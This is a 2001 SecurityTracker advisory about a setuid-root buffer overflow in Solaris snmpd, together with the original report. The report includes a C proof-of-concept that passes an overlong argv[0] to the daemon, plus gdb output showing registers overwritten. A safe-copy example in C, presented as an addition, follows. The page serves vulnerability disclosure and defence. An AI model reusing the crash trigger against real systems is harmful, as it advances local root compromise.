SecurityTracker.com
Category:   OS (UNIX)  >   SNMP Daemon
Vendors:   Sun
Sun Solaris SNMP Network Management Daemon for Enterprise 10,000 May Give Root Access To Local Users
SecurityTracker Alert ID:  1001084
SecurityTracker URL:  http://securitytracker.com/id/1001084
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Mar 15 2001
Original Entry Date:  Mar 14 2001
Impact:   Execution of arbitrary code via local system, Root access via local system


Description:   It was reported that the SNMP daemon that is part of the SUNWsspop package for the Sun Enterprise 10,000 System Service Processor contains a vulnerability that allows local users to execute arbitrary code on the server with root privileges, leading to root-level access to the server.

The /opt/SUNWssp/bin/snmpd command (SNMP proxy agent) reportedly contains a buffer overflow: the application copies a user-supplied command line parameter, its own name (argv[0]), to an internal variable without checking the length of the parameter. Because snmpd is setuid root, a local user can cause commands to be executed with root privileges.

The original report illustrates the vulnerable code and the technical results of its buffer overflow.

Impact:   An authorized local user can cause commands to be executed with root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com
Cause:   Boundary error
Underlying OS:  UNIX (Solaris - SunOS)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Vendor Confirms Bug (Re: Sun Solaris SNMP Network Management Daemon for Enterprise 10,000 May Give Root Access To Local Users)
The vendor confirms the bug.



 Source Message Contents

Subject:  Solaris 5.8 snmpd Vulnerability


Description

The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
and contains a buffer overflow. The problem occurs when it copies its own
name (argv[0]) to an internal variable without checking
its length, and this causes the overflow.

Vulnerable Version

Sun Solaris 5.8

Technical Description

-----------------------------------------------------

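#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Runs snmpd with an argv[0] of the length given on the command line. */
int main(int argc, char **argv)
{
    char *buf;
    int len;
    if (argc < 2 || (len = atoi(argv[1])) < 1)
        return 1;
    buf = malloc(len);
    if (buf == NULL)
        return 1;
    memset(buf, 0x41, len - 1);   /* fill with 'A' */
    buf[len - 1] = 0;             /* NUL-terminate */
    execl("/opt/SUNWssp/bin/snmpd", buf, (char *)0);
    return 1;                     /* reached only if execl fails */
}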

-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

$ ./snmpd-demo 700
Segmentation Fault (core dumped)

$ gdb ./snmpd-demo --core=core

[..]

Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0             0x0      0
g1             0x78000  491520
g2             0xff22579c       -14526564
g3             0xff162d78       -15323784
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x76f98  487320
o0             0x2c1    705
o1             0xffbed9b9       -4269639
o2             0x2c1    705
o3             0x41     65
o4             0xffbed180       -4271744
o5             0xff26a147       -14245561
sp             0xffbed658       -4270504
o7             0xfee83650       -18336176
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0x41414141       1094795585   ;;;;;
i1             0xffbed6fc       -4270340     ; pointer to argv[0]
i2             0x41414141       1094795585   ;;;;;
i3             0x41414141       1094795585   ;;;;;
i4             0x81010100       -2130640640
i5             0xff00   65280
fp             0xffbed698       -4270440
i7             0xff265474       -14265228
y              0x6      6
psr            0xfe001000       -33550336
wim            0x0      0
tbr            0x0      0
pc             0xfee32b58       -18666664
npc            0xfee32b5c       -18666660
fpsr           0x0      0
cpsr           0x0      0

(gdb) x/20x $i1
0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141


Pablo Sor
psor@afip.gov.ar
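
The report above comes down to an unchecked strcpy() of argv[0], a string whose length is chosen by whoever invokes the program. As an added example (not code from the original report or from Sun), this C function shows a length-checked alternative for a setuid program; the buffer size `PROGNAME_MAX`, the name `safe_progname` and the fallback string are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define PROGNAME_MAX 64   /* assumed size of the internal name buffer */

/* Unsafe pattern described in the advisory, shown only for contrast:
 *     char name[PROGNAME_MAX];
 *     strcpy(name, argv[0]);     (argv[0] length is set by the caller)
 */

/*
 * Copy the program's base name into dst (capacity dstlen) without
 * trusting argv[0]. Returns 0 on success, -1 if argv[0] is missing,
 * empty, or too long for dst. On failure dst holds the fixed fallback
 * name, so the caller can still log before exiting.
 */
int safe_progname(char *dst, size_t dstlen, int argc, char *const argv[],
                  const char *fallback)
{
    const char *src = NULL, *slash;
    size_t len;
    int rc = 0;

    if (dst == NULL || dstlen == 0 || fallback == NULL)
        return -1;
    if (argc > 0 && argv != NULL && argv[0] != NULL) {
        slash = strrchr(argv[0], '/');
        src = slash ? slash + 1 : argv[0];
    }
    if (src == NULL || *src == '\0' || strlen(src) >= dstlen) {
        src = fallback;           /* reject; never truncate silently */
        rc = -1;
    }
    len = strlen(src);
    if (len >= dstlen)            /* fallback itself larger than dst */
        len = dstlen - 1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return rc;
}

int main(int argc, char *argv[])
{
    char name[PROGNAME_MAX];
    /* A privileged program should refuse to continue on failure. */
    return safe_progname(name, sizeof name, argc, argv, "snmpd") ? 1 : 0;
}
```
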


 
 



Copyright 2021, SecurityGlobal.net LLC